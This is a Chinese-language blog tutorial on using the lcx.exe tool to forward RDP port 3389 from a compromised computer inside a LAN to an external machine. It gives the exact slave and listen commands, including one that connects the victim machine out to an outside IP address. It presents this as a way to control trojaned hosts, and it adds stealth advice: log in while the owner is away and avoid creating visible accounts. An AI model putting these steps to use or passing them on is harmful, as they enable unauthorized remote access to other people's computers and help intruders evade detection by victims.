使用LCX进行内网端口转发

参考博客,友情链接:
  • https://blog.csdn.net/kali_linux/article/details/48350343
  • https://blog.csdn.net/xiaoshan812613234/article/details/38495071

局域网中的某台计算机仅仅开放了Web服务,该服务仅能供内网用户使用,而外网用户根本没有办法直接访问。因此要想让外网用户能够访问局域网中的系统服务,这必须进行端口映射等操作才行。端口映射在入侵内网的时候经常用到,特别是要登陆远程终端服务时,使用端口映射就非常方便。

Lcx.exe是一个端口转发工具,相当于把目标服务器A上的3389端口转发到具有外网ip地址的B机上(即我们自己的主机或是已经控制的主机),这样链接B机的3389端口就相当于链接A机的3389端口了,Lcx程序多用于被控制计算机处于内网的时候,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登录到本机进行管理方便,因此在很多情况下,都会想方设法在被控制计算机上开启3389端口,然后通过lcx等进行端口转发,进而在本地连接到被控制计算机的远程终端并进行管理和使用。

1、确定被控制计算机的IP地址

ipconfig /all查看网络配置情况,例如被控计算机的IP为192.168.80.129

2、在被控制计算机上执行端口转发命令

在被控制计算机上(A机)执行: lcx -slave 218.69.13.35 51 192.168.80.129 3389,执行完成后会给出一些提示。如下图:

在这里插入图片描述
说明:

lcx一共有三条命令:

  • 第一条命令(lcx -listen 51 3389)(3389可以设置为任意没使用的端口数字)是在具有外网独立IP的计算机上执行(即B机)表示在本机上监听51端口,该端口主要是接受被控制计算机3389端口转发过来的数据;
  • 第二条命令(lcx -slave 218.69.13.35 51 192.168.80.129 3389)表示将本机IP地址为192.168.80.129的3389端口转发到远程地址为218.69.13.35的51端口上;
  • 第三条命令式端口转向。
3、在本机上执行监听命令

在本机cmd下执行 lcx -listen 51 3389命令,监听51端口,监听成功后,会显示如下图:

在这里插入图片描述
注意:

  • 1、在本机上监听的端口必须是未使用的端口,可以使用 netstat -an |find “51”命令来进行查看,如果没有显示结果则是表示51端口可以用来进行监听;
  • 2、被控制计算机与本机成功建立连接后会不停的显示连接数据,如果未出现发送数据和接受的情况,说明连接建立不成功。如下图:
4、在本机使用远程终端进行登录

打开远程终端连接器,输入127.0.0.1进行连接后,即可远程进入被控制计算机的桌面。

在这里插入图片描述
注意:

  • (1)如果被控制的计算机室linux服务器,则在登录时可以直接进行登陆;如果被控制计算机室windows系统,则最好选择用户不在计算机的时间进行登陆,否则容易被发现;
  • (2)不要轻易在被控制计算机上建立账号,尤其是windows,建立账号后,会立即在登陆界面中进行显示。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值